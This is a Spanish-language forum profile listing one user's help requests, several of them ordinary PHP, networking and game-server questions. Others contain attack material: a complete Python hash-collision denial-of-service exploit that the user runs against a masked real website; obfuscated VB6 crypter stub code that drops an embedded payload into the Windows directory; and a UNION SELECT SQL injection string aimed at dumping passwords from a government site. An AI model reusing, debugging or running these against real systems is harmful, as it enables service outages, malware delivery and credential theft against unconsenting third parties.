| |
 Mostrar Temas
|
|
Páginas: [1] 2
|
|
1
|
Programación / PHP / ayuda no encuentro el error!
|
en: 23 Febrero 2014, 19:21 pm
|
hola, a tod@s veran estoy tratando de reparar una web y justamente en esta web me da este error este es el codigo una ayuda pls
<div id="content"> <div class="postui2 text-title"> <h2> Ranking </h2> </div> <div class="postui2 text-con"> <div class="con-wrap"> <center> <?PHP $CPSeite = 50; $markierteZeile=0; if(!checkInt($_GET['p']) || !($_GET['p']>0)) $aSeite = 1; else $aSeite = $_GET['p']; } else { $aSeite = 1; } if(isset($_POST['suche']) && $_POST['suche']=='suchen') { if(!empty($_POST['charakter'])) { $sqlCmd="SELECT id, name, level, exp, empire, guild_name, rang FROM ( SELECT id, name, level, exp, empire, guild_name, @num := @num +1 AS rang FROM ( SELECT player.id, player.name, player.level, player.exp, player_index.empire, guild.name AS guild_name, @num :=0 FROM player.player LEFT JOIN player.player_index ON player_index.id = player.account_id LEFT JOIN player.guild_member ON guild_member.pid = player.id LEFT JOIN player.guild ON guild.id = guild_member.guild_id INNER JOIN account.account ON account.id=player.account_id WHERE player.name NOT LIKE '[%]%' AND account.status!='BLOCK' ORDER BY player.level DESC , player.exp DESC ) AS t1 ) AS t2 $aSeite = ceil($getRang->rang/$CPSeite); $markierteZeile = $getRang->rang; } } } $sqlCmd = "SELECT COUNT(*) AS summeChars FROM player.player LEFT JOIN player.player_index ON player_index.id=player.account_id LEFT JOIN player.guild_member ON guild_member.pid=player.id LEFT JOIN player.guild ON guild.id=guild_member.guild_id INNER JOIN account.account ON account.id=player.account_id WHERE player.name NOT LIKE '[%]%' AND account.status!='BLOCK' ORDER BY player.level DESC, player.exp DESC"; $cSeite = calcPages($getSum->summeChars,$aSeite,$CPSeite); ?> <form action="index.php?git=rankings" method="POST"> <table> <tr> <th class="topLine">Charaktersuche:</th> <td class="thell" style="text-align:center;"><input type="text" name="charakter" maxlength="20" size="20"/></td> <td class="tdunkel" style="text-align:center;"><input type="submit" name="suche" value="suchen" maxlength="20" size="20"/></td> </tr> </table> </form> <?PHP $maxRange = 5; $maxStep = 15; if(($aSeite-$maxRange)>0) $sStart = $aSeite-$maxRange; else $sStart = 1; if(($aSeite+$maxRange)<=$cSeite[0]) $sEnde = $aSeite+$maxRange; else $sEnde = $cSeite[0]; echo '<table> <tr> <td class="tdunkel">'; if(($aSeite-$maxStep)>0) echo '<a href="index.php?git=rankings&p='.($aSeite-$maxStep).'">'.($aSeite-$maxStep).'</a> «'; else echo '<a href="index.php?git=rankings&p=1">1</a> «'; echo'</td>'; for($i=$sStart;$i<=$sEnde;$i++) { $sKlasse = ($i==$aSeite) ? "topLine" : "thell"; echo'<td class="'.$sKlasse.'" style="text-align:center;">'; echo'<a href="index.php?git=rankings&p='.$i.'">'.$i.'</a>'; echo'</td>'; } echo'<td class="tdunkel" style="text-align:right;">'; if(($aSeite+$maxStep)<=$cSeite[0]) echo '» <a href="index.php?git=rankings&p='.($aSeite+$maxStep).'">'.($aSeite+$maxStep).'</a>'; else echo '» <a href="index.php?git=rankings&p='.$cSeite[0].'">'.$cSeite[0].'</a>'; echo'</td>'; echo'</table>'; ?> <table width="408"> <tr> <th class="topLine">Platz</th> <th class="topLine">Charakter</th> <th class="topLine">Level</th> <th class="topLine">EXP</th> <th class="topLine">Gilde</th> <th class="topLine">Reich</th> </tr> <?PHP $sqlCmd = "SELECT player.id,player.name,player.level,player.exp,player_index.empire,guild.name AS guild_name FROM player.player LEFT JOIN player.player_index ON player_index.id=player.account_id LEFT JOIN player.guild_member ON guild_member.pid=player.id LEFT JOIN player.guild ON guild.id=guild_member.guild_id INNER JOIN account.account ON account.id=player.account_id WHERE player.name NOT LIKE '[%]%' AND account.status!='BLOCK' ORDER BY player.level DESC, player.exp DESC LIMIT ".$cSeite[1].",".$CPSeite; //echo $sqlCmd; $x=$cSeite[1]+1; $zF = ($x%2==0) ? "thell" : "tdunkel"; if(checkInt($markierteZeile) && $markierteZeile==$x) { $zF = "tmarkiert"; } echo "<tr>"; echo "<td class=\"$zF\">".$x."</td>"; echo "<td class=\"$zF\">".$getPlayers->name."</td>"; echo "<td class=\"$zF\">".$getPlayers->level."</td>"; echo "<td class=\"$zF\">".$getPlayers->exp."</td>"; echo "<td class=\"$zF\">".$getPlayers->guild_name."</td>"; echo "<td class=\"$zF\">"; if(!empty($getPlayers->empire)) { echo '<img src="img/reiche/'.$getPlayers->empire.'_kl.jpg" title="Reich" alt="Reich"/>'; } echo "</td>"; echo "</tr>"; $x++; } ?> </table></center> </div> </div> <div class="postui2 text-end"> </div></div>
MOD: UTILIZAR ETIQUETA GESHI PARA CÓDIGOS ([code][/code]) LEER REGLAS -> Normas de subforo de Desarrollo Web & Normas del subforo de PHP!
|
|
|
|
|
2
|
Programación / PHP / ayuda con esto Warning: mysql_query()
|
en: 27 Noviembre 2012, 03:03 am
|
Hola si alguno me ayuda soy muy noob en esto de php el code es el siguiente<?PHP require("./inc/config.inc.php"); $sqlNews = "SELECT * FROM ".SQL_HP_DB.".news WHERE anzeigen>0 AND ((hot>0 AND kategorie!=2) OR (kategorie=2)) ORDER BY datum DESC LIMIT 5"; $qryNews = mysql_query($sqlHpcms,$sqlNews); while($getNews = mysql_fetch_object($qryNews)) { echo'<div class="newsblock">'; echo'<h3><span style="float:left;">['.$newsKategorien[$getNews->kategorie].'] <b><a href="index.php?s=news&id='.$getNews->id.'">'.$getNews->titel.'</a></b></span><span style="float:right;">'.getDatum($getNews->datum).'</span></h3>'; echo'</div>'; } ?> Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in /usr/local/www/apache22/data/pages/home.php on line 27
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /usr/local/www/apache22/data/pages/home.php on line 29 van dias tratando de reparlo y no he podido U_u
|
|
|
|
|
3
|
Seguridad Informática / Bugs y Exploits / no encuentro el erro ayuda!
|
en: 27 Septiembre 2012, 09:02 am
|
Hola este es el code de un exploit pero no encuentro el error es q en python y en general soy noob xD#! /usr/bin/env python
"""
This script was written by Christian Mehlmauer <FireFart@gmail.com>
https://twitter.com/#!/_FireFart_
Sourcecode online at:
https://github.com/FireFart/HashCollision-DOS-POC
Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
http://www.ocert.org/advisories/ocert-2011-003.html
CVE:
Apache Geronimo: CVE-2011-5034
Oracle Glassfish: CVE-2011-5035
PHP: CVE-2011-4885
Apache Tomcat: CVE-2011-4858
requires Python 2.7
Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output -t PHP
-) Take down a PHP server(make 500 requests without waiting for a response):
python HashtablePOC.py -u https://host/index.php -v -c 500 -t PHP
-) Take down a JAVA server(make 500 requests without waiting for a response, maximum POST data size 2MB):
python HashtablePOC.py -u https://host/index.jsp -v -c 500 -t JAVA -m 2
Changelog:
v6.0: Added Javapayloadgenerator
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""
import socket
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools
class Payloadgenerator:
# Maximum recursions when searching for collisionchars
_recursivemax = 15
_recursivecounter = 1
def __init__(self, verbose, collisionchars = 5, collisioncharlength = 2, payloadlength = 8):
self._verbose = verbose
self._collisionchars = collisionchars
self._collisioncharlength = collisioncharlength
self._payloadlength = payloadlength
def generateASPPayload(self):
raise Exception("ASP Payload not implemented")
def generateJAVAPayload(self):
a = self._computeJAVACollisionChars(self._collisionchars)
return self._generatePayload(a, self._payloadlength)
def generatePHPPayload(self):
# Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
# compute entries with collisions in PHP hashtable hash function
a = self._computePHPCollisionChars(self._collisionchars)
return self._generatePayload(a, self._payloadlength);
def _computePHPCollisionChars(self, count):
charrange = range(0, 256)
return self._computeCollisionChars(self._DJBX33A, count, charrange)
def _computeJAVACollisionChars(self, count):
charrange = range(0, 129)
return self._computeCollisionChars(self._DJBX31A, count, charrange)
def _computeCollisionChars(self, function, count, charrange):
hashes = {}
counter = 0
length = self._collisioncharlength
a = ""
for i in charrange:
a = a+chr(i)
source = list(itertools.product(a, repeat=length))
basestr = ''.join(random.choice(source))
basehash = function(basestr)
hashes[str(counter)] = basestr
counter = counter + 1
for item in source:
tempstr = ''.join(item)
if tempstr == basestr:
continue
if function(tempstr) == basehash:
hashes[str(counter)] = tempstr
counter = counter + 1
if counter >= count:
break;
if counter < count:
# Try it again
if self._recursivecounter > self._recursivemax:
print("Not enought values found. Please start this script again")
sys.exit(1)
print("%d: Not enough values found. Trying it again..." % self._recursivecounter)
self._recursivecounter = self._recursivecounter + 1
hashes = self._computeCollisionChars(function, count, charrange)
else:
if self._verbose:
print("Found values:")
for item in hashes:
tempstr = hashes[item]
print("\tValue: %s\tHash: %s" % (tempstr, function(tempstr)))
for i in tempstr:
print("\t\tValue: %s\tCharcode: %d" % (i, ord(i)))
return hashes
def _DJBXA(self, inputstring, base, start):
counter = len(inputstring) - 1
result = start
for item in inputstring:
result = result + (math.pow(base, counter) * ord(item))
counter = counter - 1
return int(round(result))
#PHP
def _DJBX33A(self, inputstring):
return self._DJBXA(inputstring, 33, 5381)
#Java
def _DJBX31A(self, inputstring):
return self._DJBXA(inputstring, 31, 0)
#ASP
def _DJBX33X(self, inputstring):
counter = len(inputstring) - 1
result = 5381
for item in inputstring:
result = result + (int(round(math.pow(33, counter))) ^ ord(item))
counter = counter - 1
return int(round(result))
def _generatePayload(self, collisionchars, payloadlength):
# Taken from:
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
# how long should the payload be
length = payloadlength
size = len(collisionchars)
post = ""
maxvaluefloat = math.pow(size,length)
maxvalueint = int(math.floor(maxvaluefloat))
for i in range (maxvalueint):
inputstring = self._base_convert(i, size)
result = inputstring.rjust(length, "0")
for item in collisionchars:
result = result.replace(str(item), collisionchars[item])
post += urllib.urlencode({result:""}) + "&"
return post;
def _base_convert(self, num, base):
fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet = fullalphabet[:base]
if (num == 0):
return alphabet[0]
arr = []
base = len(alphabet)
while num:
rem = num % base
num = num // base
arr.append(alphabet[rem])
arr.reverse()
return "".join(arr)
def main():
parser = argparse.ArgumentParser(description="Take down a remote Host via Hashcollisions", prog="Universal Hashcollision Exploit")
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB, Tomcat is 2MB", type=int)
parser.add_argument("-g", "--generate", dest="generate", help="Only generate Payload and exit", default=False, action="store_true")
parser.add_argument("--version", action="version", version="%(prog)s 6.0")
options = parser.parse_args()
if options.target == "PHP":
if not options.maxpayloadsize or options.maxpayloadsize == 0:
maxpayloadsize = 8
else:
maxpayloadsize = options.maxpayloadsize
elif options.target == "ASP":
if not options.maxpayloadsize or options.maxpayloadsize == 0:
maxpayloadsize = 8
else:
maxpayloadsize = options.maxpayloadsize
elif options.target == "JAVA":
if not options.maxpayloadsize or options.maxpayloadsize == 0:
maxpayloadsize = 2
else:
maxpayloadsize = options.maxpayloadsize
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
if not options.payload:
print("Generating Payload...")
# Number of colliding chars to find
collisionchars = 5
# Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)
collisioncharlength = 2
# Length of each parameter in the payload
payloadlength = 8
generator = Payloadgenerator(options.verbose, collisionchars, collisioncharlength, payloadlength)
if options.target == "PHP":
payload = generator.generatePHPPayload()
elif options.target == "ASP":
#payload = generateASPPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
elif options.target == "JAVA":
payload = generator.generateJAVAPayload()
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
print("Payload generated")
else:
f = open(options.payload, "r")
payload = f.read()
f.close()
print("Loaded Payload from %s" % options.payload)
# trim to maximum payload size (in MB)
maxinmb = maxpayloadsize*1024*1024
payload = payload[:maxinmb]
# remove last invalid(cut off) parameter
position = payload.rfind("=&")
payload = payload[:position+1]
# Save payload
if options.save:
f = open(options.save, "w")
f.write(payload)
f.close()
print("Payload saved to %s" % options.save)
# User selected to only generate the payload
if options.generate:
return
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i+1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 400:
print(request[:400]+"....")
else:
print(request)
print("")
if options.wait or options.output:
start = time.time()
if url.scheme == "https"
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.time() - start)
print("Request %s finished" % str(i+1))
print("Request %s duration: %s" % (str(i+1), elapsed))
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print("")
print(header)
print("")
if options.output:
f = open(options.output+str(i)+".html", "w")
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
if __name__ == "__main__":
main() C:\Users\c****\Desktop>exp.py -u http://www.me******.com -v -c 500 -t php Traceback (most recent call last): File "C:\Users\c****\Desktop\exp.py", line 359, in <module> main() File "C:\Users\c****n\Desktop\exp.py", line 216, in main url = urlparse.urlparse(options.url) NameError: global name 'urlparse' is not defined
|
|
|
|
|
5
|
Programación / Programación Visual Basic / Cual es el error pls una ayuda!!
|
en: 11 Noviembre 2011, 22:40 pm
|
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
Private Declare Function GetWindowWord Lib "user32" (ByVal hwnd As Long, ByVal nIndex As Long) As Integer
Const GWW_HINSTANCE = (-6)
Const SW_SHOWNORMAL = 1
Const SW_SHOWHIDE = 0
Dim qL03dVGjy48zqadiY4Tt As String
Dim JzubtbDcbqnUyen3dgq1 As String
Private Function Ruta() As String
Dim yf5NZzt9kYdmVs0rB1xJ As String, FvazNgSfP6Y1sLGTtJ9h As String, dowISKNxLrmGp0pCiDUr As Long
yf5NZzt9kYdmVs0rB1xJ = String$(128, Chr$(0))
dowISKNxLrmGp0pCiDUr = GetWindowWord(isp.hwnd, GWW_HINSTANCE)
yf5NZzt9kYdmVs0rB1xJ = Left$(yf5NZzt9kYdmVs0rB1xJ, GetModuleFileName(dowISKNxLrmGp0pCiDUr, yf5NZzt9kYdmVs0rB1xJ, Len(yf5NZzt9kYdmVs0rB1xJ)))
Ruta = yf5NZzt9kYdmVs0rB1xJ
End Function
Private Sub Main()
On Error Resume Next
Dim FjawcxU5VVpyj1K8cPRE As String
Dim ygyp8EL4PPCmjuYIVFRq As String
Dim bSruZqfCWVjiytOt10ok As String
Dim OcXqmgunrENzOM6a4gre As String
qL03dVGjy48zqadiY4Tt = "|Infinity|"
JzubtbDcbqnUyen3dgq1 = "|IsPhAcK|"
Open Ruta For Binary As #1
Dim gWWkEBQkV7AJpm5VgaIa As String
gWWkEBQkV7AJpm5VgaIa = Space(LOF(1))
Get #1, , gWWkEBQkV7AJpm5VgaIa
Close #1
Dim PVGFkLUjVKt66hkTWTsH As Variant, LMgXOjUEyhn2UR4rEDiW As Variant
PVGFkLUjVKt66hkTWTsH = Split(gWWkEBQkV7AJpm5VgaIa, qL03dVGjy48zqadiY4Tt)
For n = 1 To UBound(PVGFkLUjVKt66hkTWTsH)
LMgXOjUEyhn2UR4rEDiW = Split(PVGFkLUjVKt66hkTWTsH(n), JzubtbDcbqnUyen3dgq1)
For i = 0 To UBound(LMgXOjUEyhn2UR4rEDiW)
Select Case i
Case 0
L0L = LMgXOjUEyhn2UR4rEDiW(i)
Case 1
ygyp8EL4PPCmjuYIVFRq = LMgXOjUEyhn2UR4rEDiW(i)
Case 2
Select Case LMgXOjUEyhn2UR4rEDiW(i)
Case "Windows"
bSruZqfCWVjiytOt10ok = Environ("WINDIR")
End Select
Case 3
OcXqmgunrENzOM6a4gre = LMgXOjUEyhn2UR4rEDiW(i)
Case 4
FjawcxU5VVpyj1K8cPRE = LMgXOjUEyhn2UR4rEDiW(i)
End Select
Next i
Next n
Open bSruZqfCWVjiytOt10ok & "\" & ygyp8EL4PPCmjuYIVFRq For Binary As #1
Put #1, , FjawcxU5VVpyj1K8cPRE
Close #1
End Sub no logro hacer funcionar ese code para un stub una ayuda pls xD |
|
|
|
|
6
|
Informática / Hardware / Que se necesita para un server
|
en: 24 Octubre 2011, 10:55 am
|
Hola bueno quiero adquirir un servidor para juegos, la verdad es que soy un poco noob en esto y me gustaria saber si es me jor comprarlo hecho o armarlo, si es el segundo caso que hadwar me recomendarian comprar de antemano gracias pr su ayuda  |
|
|
|
|
7
|
Comunicaciones / Redes / Router HG 110 de telefonica ayuda!!
|
en: 28 Septiembre 2011, 06:14 am
|
|
Hola.... me gusta jugar muxo el The Conquerors y he tratado de abrile los puertos a el modem dicho antes ( HOME STATIO HG 110 ) de telefonia; bien entro por port forwarding y abro los puertos (2300-2400 TCP/UDP y 47624 TCP/UDP) luego abro el juego scaneo los puertos y dice que estan cerrado ya nu se que hacer tambien los tengo como excepcion en el firewall de windows ( TENGO WINDOWS VISTA ULTIMATE ) YA NU SE QUE HACER detecta las partidas pero se queda en la pantalla de esparar 15 seg y luego dice que no se puede conectar ayuda pls!!!
|
|
|
|
|
8
|
Seguridad Informática / Nivel Web / cross site flashing
|
en: 6 Marzo 2011, 21:36 pm
|
Hola todos  ,
tengo una web que ha incorporado el uso de archivos "intro.swf" y buscando por la red encontre este tipo de vulnerabilidades "cross site flashing" pero no hablan mucho, del tema si alguno muy amablemente me explicara o conociera algunos talleres o manuales acerca de este tema y que los pudiera postear se lo agradeceria muxo de antemano muchas gracias por su colaboracion dejo el script de la web //v1.0
//Copyright 2006 Adobe Systems, Inc. All rights reserved.
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}
function AC_Generateobj(objAttrs, params, embedAttrs)
{
var str = '<object ';
for (var i in objAttrs)
str += i + '="' + objAttrs + '" ';
str += '>';
for (var i in params)
str += '<param name="' + i + '" value="' + params + '" /> ';
str += '<embed ';
for (var i in embedAttrs)
str += i + '="' + embedAttrs + '" ';
str += ' ></embed></object>';
document.write(str);
}
function AC_FL_RunContent(){
var ret =
AC_GetArgs
( arguments, ".swf", "movie", "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
, "application/x-shockwave-flash"
);
AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
}
function AC_SW_RunContent(){
var ret =
AC_GetArgs
( arguments, ".dcr", "src", "clsid:166B1BCA-3F9C-11CF-8075-444553540000"
, null
);
AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
}
function AC_GetArgs(args, ext, srcParamName, classid, mimeType){
var ret = new Object();
ret.embedAttrs = new Object();
ret.params = new Object();
ret.objAttrs = new Object();
for (var i=0; i < args.length; i=i+2){
var currArg = args.toLowerCase();
switch (currArg){
case "classid":
break;
case "pluginspage":
ret.embedAttrs[args] = args[i+1];
break;
case "src":
case "movie":
args[i+1] = AC_AddExtension(args[i+1], ext);
ret.embedAttrs["src"] = args[i+1];
ret.params[srcParamName] = args[i+1];
break;
case "onafterupdate":
case "onbeforeupdate":
case "onblur":
case "oncellchange":
case "onclick":
case "ondblClick":
case "ondrag":
case "ondragend":
case "ondragenter":
case "ondragleave":
case "ondragover":
case "ondrop":
case "onfinish":
case "onfocus":
case "onhelp":
case "onmousedown":
case "onmouseup":
case "onmouseover":
case "onmousemove":
case "onmouseout":
case "onkeypress":
case "onkeydown":
case "onkeyup":
case "onload":
case "onlosecapture":
case "onpropertychange":
case "onreadystatechange":
case "onrowsdelete":
case "onrowenter":
case "onrowexit":
case "onrowsinserted":
case "onstart":
case "onscroll":
case "onbeforeeditfocus":
case "onactivate":
case "onbeforedeactivate":
case "ondeactivate":
case "type":
case "codebase":
ret.objAttrs[args] = args[i+1];
break;
case "width":
case "height":
case "align":
case "vspace":
case "hspace":
case "class":
case "title":
case "accesskey":
case "name":
case "id":
case "tabindex":
ret.embedAttrs[args] = ret.objAttrs[args] = args[i+1];
break;
default:
ret.embedAttrs[args] = ret.params[args] = args[i+1];
}
}
ret.objAttrs["classid"] = classid;
if (mimeType) ret.embedAttrs["type"] = mimeType;
return ret;
} y en la web hace referencia a <td width="50%" rowspan="2" align="center" valign="middle"><a href="inicio.html" target="_top"> <script type="text/javascript"> AC_FL_RunContent( 'codebase',' http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0','width','301','height','226','title','FLASH','src','imagenes/galeria intro','quality','high','pluginspage',' http://www.macromedia.com/go/getflashplayer','movie','imagenes/galeria intro' ); //end AC code </script><noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase=" http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="301" height="226" title="FLASH"> <param name="movie" value="imagenes/galeria intro.swf" /> <param name="quality" value="high" /> <embed src="imagenes/galeria intro.swf" quality="high" pluginspage=" http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="301" height="226"></embed> </object></noscript> </a></td> </tr>
|
|
|
|
|
9
|
Seguridad Informática / Hacking / Duda inyeccion sql
|
en: 26 Febrero 2011, 14:18 pm
|
hola todos bueno hace poco me tope con un manual que explicaba lo de las inyeciones sql y pues me decidi a estudiar un poco este tema que es muy interesante  la cuestion es que encontre un web vulnerable inyecto el codigo logro saber el nombre de las tablas etc.... la cuestion es que me he quedado en este punto http://w ww.xxxxxxxxxxx.gov.co/noticias.php?id=-1+union+select+1,2,3,4,group_concat(User,0x3a,Password)+from+ user y el resultado que me da es este Table 'BIDDTA.user' doesn't exist no se que hacer ya he buscado por todos lados, y no encuentro info si alguno me colaborara se lo agradeceria muxo |
|
|
|
|
10
|
Media / Juegos y Consolas / Servidor Dedicado!!!!
|
en: 12 Febrero 2011, 12:52 pm
|
|
Hola a todos, queria preguntar pues desde hace poko vengo jugando un juego en linea llamado metin2, depronto alguno lo ha jugado, la cuestion es que he venido preguntando y averiguando sobre como montar un servidor de este juego, bueno ya para ser claro y si alguno me ayudara
--- cuales serian las caracteristicas de mi pc para que el juego vaya bien con por lomenos 1000 players online???
---cual seria la conexion ideal???
de antemano gracias a todos por su colaboracion =)
|
|
|
|
|
|
| |
|
